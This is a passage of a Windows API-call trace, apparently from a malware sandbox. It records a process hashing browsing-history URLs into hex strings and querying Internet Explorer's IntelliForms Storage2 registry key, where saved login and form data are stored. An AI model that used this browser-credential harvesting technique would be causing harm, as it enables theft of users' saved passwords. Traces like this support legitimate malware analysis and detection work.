out: _Buffer="B6") returned 2 [0249.383] lstrlenW (lpString="4BD747F557") returned 10 [0249.383] lstrlenW (lpString="B6") returned 2 [0249.383] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0860 [0249.383] lstrcpyW (in: lpString1=0xd1d0860, lpString2="4BD747F557" | out: lpString1="4BD747F557") returned="4BD747F557" [0249.383] lstrcatW (in: lpString1="4BD747F557", lpString2="B6" | out: lpString1="4BD747F557B6") returned="4BD747F557B6" [0249.383] LocalFree (hMem=0x5d33950) returned 0x0 [0249.383] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="76") returned 2 [0249.383] lstrlenW (lpString="4BD747F557B6") returned 12 [0249.383] lstrlenW (lpString="76") returned 2 [0249.414] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d09c0 [0249.414] lstrcpyW (in: lpString1=0xd1d09c0, lpString2="4BD747F557B6" | out: lpString1="4BD747F557B6") returned="4BD747F557B6" [0249.414] lstrcatW (in: lpString1="4BD747F557B6", lpString2="76" | out: lpString1="4BD747F557B676") returned="4BD747F557B676" [0249.415] LocalFree (hMem=0xd1d0860) returned 0x0 [0249.415] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0F") returned 2 [0249.415] lstrlenW (lpString="4BD747F557B676") returned 14 [0249.415] lstrlenW (lpString="0F") returned 2 [0249.415] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d05a0 [0249.415] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="4BD747F557B676" | out: lpString1="4BD747F557B676") returned="4BD747F557B676" [0249.415] lstrcatW (in: lpString1="4BD747F557B676", lpString2="0F" | out: lpString1="4BD747F557B6760F") returned="4BD747F557B6760F" [0249.415] LocalFree (hMem=0xd1d09c0) returned 0x0 [0249.415] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FA") returned 2 [0249.415] lstrlenW (lpString="4BD747F557B6760F") returned 16 [0249.415] lstrlenW (lpString="FA") returned 2 [0249.415] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0e90 [0249.415] lstrcpyW (in: lpString1=0xd1d0e90, lpString2="4BD747F557B6760F" | out: lpString1="4BD747F557B6760F") returned="4BD747F557B6760F" [0249.415] lstrcatW (in: lpString1="4BD747F557B6760F", lpString2="FA" | out: lpString1="4BD747F557B6760FFA") returned="4BD747F557B6760FFA" [0249.415] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.415] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="71") returned 2 [0249.415] lstrlenW (lpString="4BD747F557B6760FFA") returned 18 [0249.415] lstrlenW (lpString="71") returned 2 [0249.415] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd216a30 [0249.415] lstrcpyW (in: lpString1=0xd216a30, lpString2="4BD747F557B6760FFA" | out: lpString1="4BD747F557B6760FFA") returned="4BD747F557B6760FFA" [0249.415] lstrcatW (in: lpString1="4BD747F557B6760FFA", lpString2="71" | out: lpString1="4BD747F557B6760FFA71") returned="4BD747F557B6760FFA71" [0249.415] LocalFree (hMem=0xd1d0e90) returned 0x0 [0249.415] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D2") returned 2 [0249.415] lstrlenW (lpString="4BD747F557B6760FFA71") returned 20 [0249.415] lstrlenW (lpString="D2") returned 2 [0249.415] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217570 [0249.415] lstrcpyW (in: lpString1=0xd217570, lpString2="4BD747F557B6760FFA71" | out: lpString1="4BD747F557B6760FFA71") returned="4BD747F557B6760FFA71" [0249.415] lstrcatW (in: lpString1="4BD747F557B6760FFA71", lpString2="D2" | out: lpString1="4BD747F557B6760FFA71D2") returned="4BD747F557B6760FFA71D2" [0249.415] LocalFree (hMem=0xd216a30) returned 0x0 [0249.415] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D2") returned 2 [0249.415] lstrlenW (lpString="4BD747F557B6760FFA71D2") returned 22 [0249.415] lstrlenW (lpString="D2") returned 2 [0249.415] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217030 [0249.415] lstrcpyW (in: lpString1=0xd217030, lpString2="4BD747F557B6760FFA71D2" | out: lpString1="4BD747F557B6760FFA71D2") returned="4BD747F557B6760FFA71D2" [0249.416] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2", lpString2="D2" | out: lpString1="4BD747F557B6760FFA71D2D2") returned="4BD747F557B6760FFA71D2D2" [0249.416] LocalFree (hMem=0xd217570) returned 0x0 [0249.416] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="75") returned 2 [0249.416] lstrlenW (lpString="4BD747F557B6760FFA71D2D2") returned 24 [0249.416] lstrlenW (lpString="75") returned 2 [0249.416] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd218470 [0249.416] lstrcpyW (in: lpString1=0xd218470, lpString2="4BD747F557B6760FFA71D2D2" | out: lpString1="4BD747F557B6760FFA71D2D2") returned="4BD747F557B6760FFA71D2D2" [0249.416] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D2", lpString2="75" | out: lpString1="4BD747F557B6760FFA71D2D275") returned="4BD747F557B6760FFA71D2D275" [0249.416] LocalFree (hMem=0xd217030) returned 0x0 [0249.416] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B2") returned 2 [0249.416] lstrlenW (lpString="4BD747F557B6760FFA71D2D275") returned 26 [0249.416] lstrlenW (lpString="B2") returned 2 [0249.416] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214660 [0249.416] lstrcpyW (in: lpString1=0xd214660, lpString2="4BD747F557B6760FFA71D2D275" | out: lpString1="4BD747F557B6760FFA71D2D275") returned="4BD747F557B6760FFA71D2D275" [0249.416] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275", lpString2="B2" | out: lpString1="4BD747F557B6760FFA71D2D275B2") returned="4BD747F557B6760FFA71D2D275B2" [0249.416] LocalFree (hMem=0xd218470) returned 0x0 [0249.416] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F7") returned 2 [0249.416] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2") returned 28 [0249.416] lstrlenW (lpString="F7") returned 2 [0249.416] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd216060 [0249.416] lstrcpyW (in: lpString1=0xd216060, lpString2="4BD747F557B6760FFA71D2D275B2" | out: lpString1="4BD747F557B6760FFA71D2D275B2") returned="4BD747F557B6760FFA71D2D275B2" [0249.416] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2", lpString2="F7" | out: lpString1="4BD747F557B6760FFA71D2D275B2F7") returned="4BD747F557B6760FFA71D2D275B2F7" [0249.416] LocalFree (hMem=0xd214660) returned 0x0 [0249.416] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6D") returned 2 [0249.416] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2F7") returned 30 [0249.416] lstrlenW (lpString="6D") returned 2 [0249.416] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd2148d0 [0249.416] lstrcpyW (in: lpString1=0xd2148d0, lpString2="4BD747F557B6760FFA71D2D275B2F7" | out: lpString1="4BD747F557B6760FFA71D2D275B2F7") returned="4BD747F557B6760FFA71D2D275B2F7" [0249.417] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2F7", lpString2="6D" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76D") returned="4BD747F557B6760FFA71D2D275B2F76D" [0249.417] LocalFree (hMem=0xd216060) returned 0x0 [0249.417] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.417] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2F76D") returned 32 [0249.417] lstrlenW (lpString="C4") returned 2 [0249.417] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd216060 [0249.417] lstrcpyW (in: lpString1=0xd216060, lpString2="4BD747F557B6760FFA71D2D275B2F76D" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76D") returned="4BD747F557B6760FFA71D2D275B2F76D" [0249.417] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2F76D", lpString2="C4" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4") returned="4BD747F557B6760FFA71D2D275B2F76DC4" [0249.417] LocalFree (hMem=0xd2148d0) returned 0x0 [0249.417] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B3") returned 2 [0249.417] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2F76DC4") returned 34 [0249.417] lstrlenW (lpString="B3") returned 2 [0249.417] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67e60 [0249.417] lstrcpyW (in: lpString1=0x5d67e60, lpString2="4BD747F557B6760FFA71D2D275B2F76DC4" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4") returned="4BD747F557B6760FFA71D2D275B2F76DC4" [0249.417] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4", lpString2="B3" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3" [0249.417] LocalFree (hMem=0xd216060) returned 0x0 [0249.417] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A7") returned 2 [0249.417] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2F76DC4B3") returned 36 [0249.417] lstrlenW (lpString="A7") returned 2 [0249.417] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d66ce0 [0249.417] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="4BD747F557B6760FFA71D2D275B2F76DC4B3" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3" [0249.417] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3", lpString2="A7" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A7") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3A7" [0249.417] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.417] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0D") returned 2 [0249.417] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2F76DC4B3A7") returned 38 [0249.417] lstrlenW (lpString="0D") returned 2 [0249.417] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67e60 [0249.417] lstrcpyW (in: lpString1=0x5d67e60, lpString2="4BD747F557B6760FFA71D2D275B2F76DC4B3A7" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A7") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3A7" [0249.417] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A7", lpString2="0D" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D" [0249.417] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.417] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B5") returned 2 [0249.417] lstrlenW (lpString="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D") returned 40 [0249.417] lstrlenW (lpString="B5") returned 2 [0249.417] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67840 [0249.417] lstrcpyW (in: lpString1=0x5d67840, lpString2="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D" [0249.417] lstrcatW (in: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A70D", lpString2="B5" | out: lpString1="4BD747F557B6760FFA71D2D275B2F76DC4B3A70DB5") returned="4BD747F557B6760FFA71D2D275B2F76DC4B3A70DB5" [0249.418] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.418] CryptDestroyHash (hHash=0x5d9dfa0) returned 1 [0249.418] CryptReleaseContext (hProv=0x5d3ab10, dwFlags=0x0) returned 1 [0249.418] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.418] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.418] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.418] LocalFree (hMem=0x5d67840) returned 0x0 [0249.418] RegEnumValueW (in: hKey=0x94c, dwIndex=0xe, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url9", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.418] StrStrIW (lpFirst="weather.com", lpSrch="?") returned 0x0 [0249.418] StrStrIW (lpFirst="weather.com", lpSrch="http://") returned 0x0 [0249.418] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37f10) returned 1 [0249.419] CryptCreateHash (in: hProv=0x5d37f10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.419] lstrlenW (lpString="weather.com") returned 11 [0249.419] CryptHashData (hHash=0x5d9e240, pbData=0x43ed4e0, dwDataLen=0x18, dwFlags=0x0) returned 1 [0249.419] CryptGetHashParam (in: hHash=0x5d9e240, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.419] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A5") returned 2 [0249.419] lstrlenW (lpString="") returned 0 [0249.419] lstrlenW (lpString="A5") returned 2 [0249.419] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b4580 [0249.419] lstrcpyW (in: lpString1=0xd1b4580, lpString2="" | out: lpString1="") returned="" [0249.419] lstrcatW (in: lpString1="", lpString2="A5" | out: lpString1="A5") returned="A5" [0249.419] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B4") returned 2 [0249.419] lstrlenW (lpString="A5") returned 2 [0249.419] lstrlenW (lpString="B4") returned 2 [0249.419] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.419] lstrcpyW (in: lpString1=0x5d33db0, lpString2="A5" | out: lpString1="A5") returned="A5" [0249.420] lstrcatW (in: lpString1="A5", lpString2="B4" | out: lpString1="A5B4") returned="A5B4" [0249.420] LocalFree (hMem=0xd1b4580) returned 0x0 [0249.420] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5C") returned 2 [0249.420] lstrlenW (lpString="A5B4") returned 4 [0249.420] lstrlenW (lpString="5C") returned 2 [0249.420] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.420] lstrcpyW (in: lpString1=0x5d34170, lpString2="A5B4" | out: lpString1="A5B4") returned="A5B4" [0249.420] lstrcatW (in: lpString1="A5B4", lpString2="5C" | out: lpString1="A5B45C") returned="A5B45C" [0249.420] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.420] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="39") returned 2 [0249.420] lstrlenW (lpString="A5B45C") returned 6 [0249.420] lstrlenW (lpString="39") returned 2 [0249.420] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.420] lstrcpyW (in: lpString1=0x5d33db0, lpString2="A5B45C" | out: lpString1="A5B45C") returned="A5B45C" [0249.420] lstrcatW (in: lpString1="A5B45C", lpString2="39" | out: lpString1="A5B45C39") returned="A5B45C39" [0249.420] LocalFree (hMem=0x5d34170) returned 0x0 [0249.420] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="17") returned 2 [0249.420] lstrlenW (lpString="A5B45C39") returned 8 [0249.420] lstrlenW (lpString="17") returned 2 [0249.420] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.420] lstrcpyW (in: lpString1=0x5d34170, lpString2="A5B45C39" | out: lpString1="A5B45C39") returned="A5B45C39" [0249.420] lstrcatW (in: lpString1="A5B45C39", lpString2="17" | out: lpString1="A5B45C3917") returned="A5B45C3917" [0249.420] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.420] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E9") returned 2 [0249.420] lstrlenW (lpString="A5B45C3917") returned 10 [0249.420] lstrlenW (lpString="E9") returned 2 [0249.420] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1cfc00 [0249.420] lstrcpyW (in: lpString1=0xd1cfc00, lpString2="A5B45C3917" | out: lpString1="A5B45C3917") returned="A5B45C3917" [0249.420] lstrcatW (in: lpString1="A5B45C3917", lpString2="E9" | out: lpString1="A5B45C3917E9") returned="A5B45C3917E9" [0249.420] LocalFree (hMem=0x5d34170) returned 0x0 [0249.421] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D1") returned 2 [0249.421] lstrlenW (lpString="A5B45C3917E9") returned 12 [0249.421] lstrlenW (lpString="D1") returned 2 [0249.421] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d09c0 [0249.421] lstrcpyW (in: lpString1=0xd1d09c0, lpString2="A5B45C3917E9" | out: lpString1="A5B45C3917E9") returned="A5B45C3917E9" [0249.421] lstrcatW (in: lpString1="A5B45C3917E9", lpString2="D1" | out: lpString1="A5B45C3917E9D1") returned="A5B45C3917E9D1" [0249.421] LocalFree (hMem=0xd1cfc00) returned 0x0 [0249.421] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CF") returned 2 [0249.421] lstrlenW (lpString="A5B45C3917E9D1") returned 14 [0249.421] lstrlenW (lpString="CF") returned 2 [0249.421] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d1150 [0249.421] lstrcpyW (in: lpString1=0xd1d1150, lpString2="A5B45C3917E9D1" | out: lpString1="A5B45C3917E9D1") returned="A5B45C3917E9D1" [0249.421] lstrcatW (in: lpString1="A5B45C3917E9D1", lpString2="CF" | out: lpString1="A5B45C3917E9D1CF") returned="A5B45C3917E9D1CF" [0249.421] LocalFree (hMem=0xd1d09c0) returned 0x0 [0249.421] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="64") returned 2 [0249.421] lstrlenW (lpString="A5B45C3917E9D1CF") returned 16 [0249.421] lstrlenW (lpString="64") returned 2 [0249.421] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1cfc00 [0249.421] lstrcpyW (in: lpString1=0xd1cfc00, lpString2="A5B45C3917E9D1CF" | out: lpString1="A5B45C3917E9D1CF") returned="A5B45C3917E9D1CF" [0249.421] lstrcatW (in: lpString1="A5B45C3917E9D1CF", lpString2="64" | out: lpString1="A5B45C3917E9D1CF64") returned="A5B45C3917E9D1CF64" [0249.421] LocalFree (hMem=0xd1d1150) returned 0x0 [0249.421] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B6") returned 2 [0249.422] lstrlenW (lpString="A5B45C3917E9D1CF64") returned 18 [0249.422] lstrlenW (lpString="B6") returned 2 [0249.422] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2167f0 [0249.422] lstrcpyW (in: lpString1=0xd2167f0, lpString2="A5B45C3917E9D1CF64" | out: lpString1="A5B45C3917E9D1CF64") returned="A5B45C3917E9D1CF64" [0249.422] lstrcatW (in: lpString1="A5B45C3917E9D1CF64", lpString2="B6" | out: lpString1="A5B45C3917E9D1CF64B6") returned="A5B45C3917E9D1CF64B6" [0249.422] LocalFree (hMem=0xd1cfc00) returned 0x0 [0249.422] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0A") returned 2 [0249.422] lstrlenW (lpString="A5B45C3917E9D1CF64B6") returned 20 [0249.422] lstrlenW (lpString="0A") returned 2 [0249.422] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2168b0 [0249.422] lstrcpyW (in: lpString1=0xd2168b0, lpString2="A5B45C3917E9D1CF64B6" | out: lpString1="A5B45C3917E9D1CF64B6") returned="A5B45C3917E9D1CF64B6" [0249.422] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B6", lpString2="0A" | out: lpString1="A5B45C3917E9D1CF64B60A") returned="A5B45C3917E9D1CF64B60A" [0249.422] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.422] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C2") returned 2 [0249.422] lstrlenW (lpString="A5B45C3917E9D1CF64B60A") returned 22 [0249.422] lstrlenW (lpString="C2") returned 2 [0249.422] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217570 [0249.422] lstrcpyW (in: lpString1=0xd217570, lpString2="A5B45C3917E9D1CF64B60A" | out: lpString1="A5B45C3917E9D1CF64B60A") returned="A5B45C3917E9D1CF64B60A" [0249.422] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60A", lpString2="C2" | out: lpString1="A5B45C3917E9D1CF64B60AC2") returned="A5B45C3917E9D1CF64B60AC2" [0249.422] LocalFree (hMem=0xd2168b0) returned 0x0 [0249.422] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="83") returned 2 [0249.422] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2") returned 24 [0249.422] lstrlenW (lpString="83") returned 2 [0249.422] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd2179f0 [0249.422] lstrcpyW (in: lpString1=0xd2179f0, lpString2="A5B45C3917E9D1CF64B60AC2" | out: lpString1="A5B45C3917E9D1CF64B60AC2") returned="A5B45C3917E9D1CF64B60AC2" [0249.422] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2", lpString2="83" | out: lpString1="A5B45C3917E9D1CF64B60AC283") returned="A5B45C3917E9D1CF64B60AC283" [0249.422] LocalFree (hMem=0xd217570) returned 0x0 [0249.422] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8B") returned 2 [0249.422] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC283") returned 26 [0249.422] lstrlenW (lpString="8B") returned 2 [0249.422] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd2156a0 [0249.422] lstrcpyW (in: lpString1=0xd2156a0, lpString2="A5B45C3917E9D1CF64B60AC283" | out: lpString1="A5B45C3917E9D1CF64B60AC283") returned="A5B45C3917E9D1CF64B60AC283" [0249.422] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC283", lpString2="8B" | out: lpString1="A5B45C3917E9D1CF64B60AC2838B") returned="A5B45C3917E9D1CF64B60AC2838B" [0249.422] LocalFree (hMem=0xd2179f0) returned 0x0 [0249.422] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C7") returned 2 [0249.422] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838B") returned 28 [0249.423] lstrlenW (lpString="C7") returned 2 [0249.423] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215b80 [0249.423] lstrcpyW (in: lpString1=0xd215b80, lpString2="A5B45C3917E9D1CF64B60AC2838B" | out: lpString1="A5B45C3917E9D1CF64B60AC2838B") returned="A5B45C3917E9D1CF64B60AC2838B" [0249.423] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838B", lpString2="C7" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7") returned="A5B45C3917E9D1CF64B60AC2838BC7" [0249.423] LocalFree (hMem=0xd2156a0) returned 0x0 [0249.423] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="89") returned 2 [0249.423] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838BC7") returned 30 [0249.423] lstrlenW (lpString="89") returned 2 [0249.423] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214f50 [0249.423] lstrcpyW (in: lpString1=0xd214f50, lpString2="A5B45C3917E9D1CF64B60AC2838BC7" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7") returned="A5B45C3917E9D1CF64B60AC2838BC7" [0249.423] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838BC7", lpString2="89" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC789") returned="A5B45C3917E9D1CF64B60AC2838BC789" [0249.423] LocalFree (hMem=0xd215b80) returned 0x0 [0249.423] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7A") returned 2 [0249.423] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838BC789") returned 32 [0249.423] lstrlenW (lpString="7A") returned 2 [0249.423] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215500 [0249.423] lstrcpyW (in: lpString1=0xd215500, lpString2="A5B45C3917E9D1CF64B60AC2838BC789" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC789") returned="A5B45C3917E9D1CF64B60AC2838BC789" [0249.423] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838BC789", lpString2="7A" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897A") returned="A5B45C3917E9D1CF64B60AC2838BC7897A" [0249.423] LocalFree (hMem=0xd214f50) returned 0x0 [0249.423] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B8") returned 2 [0249.423] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838BC7897A") returned 34 [0249.423] lstrlenW (lpString="B8") returned 2 [0249.423] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d667a0 [0249.423] lstrcpyW (in: lpString1=0x5d667a0, lpString2="A5B45C3917E9D1CF64B60AC2838BC7897A" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897A") returned="A5B45C3917E9D1CF64B60AC2838BC7897A" [0249.423] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897A", lpString2="B8" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB8" [0249.423] LocalFree (hMem=0xd215500) returned 0x0 [0249.423] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="35") returned 2 [0249.423] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838BC7897AB8") returned 36 [0249.423] lstrlenW (lpString="35") returned 2 [0249.423] LocalAlloc (uFlags=0x40, uBytes=0xce) 